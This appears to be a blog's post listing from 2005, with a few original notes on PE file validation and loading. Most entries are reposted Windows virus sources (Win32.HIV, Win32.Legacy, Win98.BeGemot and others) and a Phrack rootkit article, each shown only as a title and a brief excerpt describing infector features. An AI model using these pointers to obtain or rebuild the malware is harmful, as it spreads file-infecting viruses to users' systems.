Reposted: Technical details of the kernel-mode rootkit newly published by Phrack
==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x06 of 0x10 |=---------------=[ Kernel-mode backdoors for Windows NT ]=--------------=| |=-------------------------------------------------------------
2005-04-28 21:49:00 3518
Original: Source program for checking PE file validity
.386 .model flat,stdcall option casemap:none include C:/masm32/include/windows.inc include C:/masm32/include/kernel32.inc include C:/masm32/include/comdlg32.inc include C:/masm32/include/user32.inc includeli
2005-04-16 14:22:00 2015
Original: Determining PE file validity
1 Check whether the value of the e_magic member of the IMAGE_DOS_HEADER structure equals "MZ", i.e. check whether the first word of the file header equals IMAGE_DOS_SIGNATURE. Why is that? Converting with the MC_ASCII conversion tool, M->77(d)->4d(h), Z->90(d)->5A(h); combined this gives ZM->5A4D(h), and looking at the equate definition in windows.inc, IMAGE_DOS_SIGNATURE equ
2005-04-16 01:43:00 2019
Original: Main steps in loading a PE file into memory
1 When a PE file is executed, the PE loader first checks the PE header offset in the DOS MZ header. If found, it ignores the DOS stub and jumps directly to the PE header. 2 The PE loader checks whether the PE header is valid; if it is, it jumps to the end of the PE header. 3 The PE loader reads the information in the section table and maps those sections into memory using memory-mapped file I/O, setting the attributes of each memory block according to the section table attributes. 4 Once the PE file is mapped into memory, the P
2005-04-16 01:10:00 7728
Reposted: Win32_Redemption_9216.asm
[win32red.c] /* Win32.REDemption.9216 virus. (c) 1998. Jacky Qwerty/29A. Description This is a resident HLL (High Level Language) Win3
2005-04-12 01:22:00 2479 1
Reposted: Win32_Plexar.asm
; Win32.Plexar ; Designed by LiteSys in Venezuela, South America ; ; PE/DOC/XLS/OUTLOOK Multithreaded Polymorphic Direct Action infector. ; ; Welcome to Pl
2005-04-12 01:18:00 2521
Reposted: Win32_Project2501.asm
comment * Name: Project 2501 OS: Win32 Coder Belial Heya , this is my first Pe-infector.Wow ,a great feeling to have finished it. Credits go out to Lord Julus and BillyBelcebub ,because of their win32
2005-04-12 01:10:00 1478
Reposted: Win32_Ordy.asm
comment " Win32.ordy by mort[MATRiX] - simple direct action current dir last section PE appender - using ordinal API values to access API Well, in viriis theres mostly use some stuff to find APIs no
2005-04-12 01:09:00 1243
Reposted: Win32_Voodoo.asm
; ============================ Win32.Voodoo_v3.1 =========================== ; Program : Voodoo v3.1 ; Description : Parasitic,crypt PE virus ; Last modified : 01.09.1999 ; Purpose : process handling
2005-04-12 01:08:00 1572
Reposted: Win32_Winux.asm
; +-----------------------+ ; : Win32/Linux.Winux : ; +--+----------------+---+ ; : by Benny/29A : ; +----------------+ ; ; ; ;Heya ppl, ; ;lemme introduce you my first multi-platform virus, the world
2005-04-12 01:06:00 1646
Reposted: Win32_Spit.asm
; ; SPIT.Win32 rev2.1 ; a Bumblebee Win32 Virus ; ; . Yeah! Its simple but FULL Win32 compatible -i think-. A non-resident ; Win32 virus using ffirst n fnext. ; . Copies into host: virus+host. When
2005-04-12 01:02:00 1745
Reposted: Win32_Savior.asm
;============================================================================ ; ; ; NAME: Win32.Savior v1.00 ; TYPE: Direct-action variable encrypting PE-infector. ; SIZE: Around 1850 bytes. ; AUTHOR:
2005-04-12 00:58:00 1398
Reposted: Win32_Screenfector.asm
; ---------- ; Win32.Screenfector by MalFunction ; ; hi out there! this is my first little win32 infector. theres nothing ; special at it, no new technique, no new way of infecting. yes, it is ; a v
2005-04-12 00:56:00 1252
Reposted: Win32_Simple.asm
; [ W32.Simple by XXXXXX ] ; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ; THIS IS A VERY SMALL AND SIMPLE WIN32 PE INFECTOR.. IT INFECTS ONLY ; FILES IN THE CURRENT DIRECTORY.
2005-04-12 00:54:00 1285
Reposted: Win32_Vulcano.asm
; Win32.Vulcano ; by Benny/29A ; ; ; ;Description ; ; ;Hello
2005-04-12 00:49:00 2505
Reposted: Win32_Zipling.asm
; W32/ZipLing - ; ; First of all this is the source code to an I-Worm. I do not guarantee it works, although ; I have tested it on my system and it had seemed to work. I lost interest in it after a wh
2005-04-12 00:45:00 1696
Reposted: Win98.Priest.asm
; Win98.Priest .386 .model flat extrn ExitProcess:PROC KER32 equ 0bff70000h Limit equ 0000h addname equ 0004h addfun equ 0008h addord equ 000Ch create equ 0010h close equ 0014h rfile equ 0018h ffind e
2005-04-12 00:43:00 1081
Reposted: Win98.Yobe.24576.asm
[yobe.asm] ; Win98.Yobe.24576 ; by Benny/29A
2005-04-12 00:41:00 2025
Reposted: win98.Milennium.asm
; Win98.Milennium ; by Benny/29A ; ; ; ;Authors description ;===================== ; ; ;Im very proud to introduce first multifiber
2005-04-12 00:39:00 4193
Reposted: Win32_Legacy.asm
; [Win32.Legacy] - MultiThreaded/Poly/EPO/MMX/RDA/AntiAV/PE/RAR/ARJ,etc. ; Copyright (c) 1999 by Billy Belcebu/iKX ; ; [ Introduction ] ; ; This is a polymorphic heavily armoured multitask virus. Its
2005-04-12 00:27:00 3905
Reposted: Win32_Kenston.asm
Win32.Kenston .386 locals jumps .model flat, STDCALL extrn ExitProcess : PROC org 1000h .data db "This is a virus.",0 .code progstart: push 0 call ExitProcess STARTVIRUS: call relativity relativity: p
2005-04-12 00:17:00 1306
Reposted: Win32_Halen.asm
; win32.Halen virus ; (C)reated by pxR[MIONS] ; January 2k+1 ; ; ; ; Introduction ; ;Let me introduce you to one of my lame viruses :) (my first one under Windows) ;This is a win32 non-re
2005-04-12 00:13:00 1849
Reposted: Win32.Jimmy.asm
; Win32.Jimmy by [email protected] ; ; Infection on Win95/98/ME, WinNT4.0, WinNT2000 ; Variable Xor Encryption ; Append Infector ; ; Yes, this is my first W32.Virus .586p .model flat jumps .radix 16 ext
2005-04-12 00:11:00 1321
Reposted: Win32.Infinite.asm
; [ Win32.Infinite Billy Belcebu/iKX ] ; [ 1699 bytes Target - Win32 Ring3 ] ; [ 17/07/00 - Made in Valencia, Spain ] ; ; ;
2005-04-12 00:10:00 1550
Reposted: Win32.Idele.asm
Win32.Idele ---[IDELE.ASM]--- .386p .model flat comment $ Idele virus version 1.9 by Doxtor L. /[T.I], July-December 2000 test version!! (infect g
2005-04-12 00:03:00 1522
Reposted: Win32.Hortiga.asm
; Win32.Hortiga ; ; Win32.h0rtiga Coded by |Zan [@deepzone.org] ; ; ?000 DeepZone - Digital Security Center ; ; http://www.deepzone.org ; ;-------------------------------------------------------------
2005-04-11 23:58:00 1377
Reposted: Win32.Hiv.asm
[HIV.ASM] COMMENT# Win32.HIV by Benny/29A Finally I finished this virus... it took me more than 8 months to code
2005-04-11 23:52:00 2441
Reposted: Win32.Heathen.asm
Win32.Heathen ; --------------------------------------------------------------------------- ; some definitions of structures API_STRUC struc OLE_MemoryAllocator dd ? GetWindowsDirectoryA dd ? CopyFileA dd ?
2005-04-11 23:43:00 1836
Reposted: Win32.Hatred.asm
comment $ Win32.Hatred V.1.0 by Lord Julus
2005-04-11 23:38:00 2488
Reposted: Win32.Harrier.asm
; Win32.Harrier ; title HDL - The pretty PE Polymorphic virus. ; page 52,130 ; ; *==================================================================* ; ! (c) 08-Sep-1997y by TechnoRat "95-th Harrier f
2005-04-11 23:34:00 1475
Reposted: Win32.Fever.asm
;============================================================================ ; ; Dengue Hemorrhagic Fever ; ; BioCoded by GriYo / 29A ; [email protected] ; ;==============================================
2005-04-11 00:20:00 3528
Reposted: Win32.Emotion.asm
comment * Win32.Emotion Disassembly by Darkman/29A
2005-04-11 00:05:00 1141
Reposted: Win32.Dream.asm
;; : Prizzy/29A : Win32.Dream : Prizzy/29A : ;; Hello people, here is my third virus especially when it is designed for; wh
2005-04-11 00:04:00 2111
Reposted: Win32.Demiurg.asm
; *************************************************************************; ******************** ********************; ******************** Win32.Demiurg ********************; ******************** by
2005-04-10 23:53:00 2088
Reposted: Win32.Diablerie.asm
comment $ Win32.Diablerie Version: 0.7 Author: Dr. Watcom (Valencia / SPAIN) Compiler: Borland Turbo Assembler (version 5.0r / 32bit) Type: PE-Infector (relocations
2005-04-10 23:47:00 1235
Reposted: Win32.Darling.asm
;============================================================================ ; ; ; NAME: Win32.Darling v1.00 ; TYPE: Direct-action variable-encrypting PE-infector. ; SIZE: Around 1700 bytes. ; AUTHOR: T-20
2005-04-10 23:28:00 1162
Reposted: Win32.Crypto.asm
;; : Prizzy/29A : Win32.Crypto : Prizzy/29A : ;; Im very proud on my very first virus at Win32 platform. It infects EXE; f
2005-04-10 23:27:00 2483
Reposted: Win32.Crash.asm
comment * Name: Crash OverWrite :-) Coder: BeLiAL Type: Companion Anything else: NO This is my first win32 virus. Its only a companion virus but it does his work very well. Its perhaps coded not so fine but im s
2005-04-10 23:26:00 882
Reposted: Win98.BeGemot.8192.asm
[bg.asm] ; Win98.BeGemot.8192 ; by Benny/29A ; ; ; ;Authors description ; ;Im very pro
2005-04-10 18:38:00 1777
Reposted: Win32.Clear.asm
; [ W32.clear by drcmda ] ; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ; SIMPLE BUT CLEAR WIN32 PE INFECTOR, USES SIMPLE XOR ENCRYPTION, ; MUTEXES AND DIRECTORY TRAVERSEL (ON
2005-04-10 18:19:00 1008